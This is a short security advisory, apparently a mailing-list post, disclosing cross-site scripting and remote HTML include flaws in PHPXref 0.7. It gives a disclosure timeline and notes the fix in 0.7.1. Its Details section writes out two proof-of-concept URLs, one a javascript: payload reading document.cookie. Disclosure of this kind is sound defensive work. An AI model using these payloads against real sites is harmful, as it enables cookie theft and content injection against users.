PHPXref version 0.7 suffers from a cross site scripting vulnerability.
1315c126618dd87d455d405922eaf2ce9ee86a21860d33dbf96aba5d753eee31
Hello list!
I want to warn you about Cross-Site Scripting and Remote HTML Include
vulnerabilities in PHPXref.
-------------------------
Affected products:
-------------------------
Vulnerable are PHPXref 0.7 and previous versions. In version PHPXref 0.7.1
the developer fixed these vulnerabilities.
----------
Details:
----------
XSS (RXI) (WASC-08):
http://site/nav.html?javascript:alert(document.cookie)
RHI (WASC-12):
http://site/nav.html?http://websecurity.com.ua
------------
Timeline:
------------
2010.12.27 - announced at my site.
2010.12.28 - informed developers.
2010.12.29 - PHPXref 0.7.1 released
(http://phpxref.sourceforge.net/Changelog).
2011.02.08 - disclosed at my site.
I mentioned about these vulnerabilities at my site
(http://websecurity.com.ua/4795/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua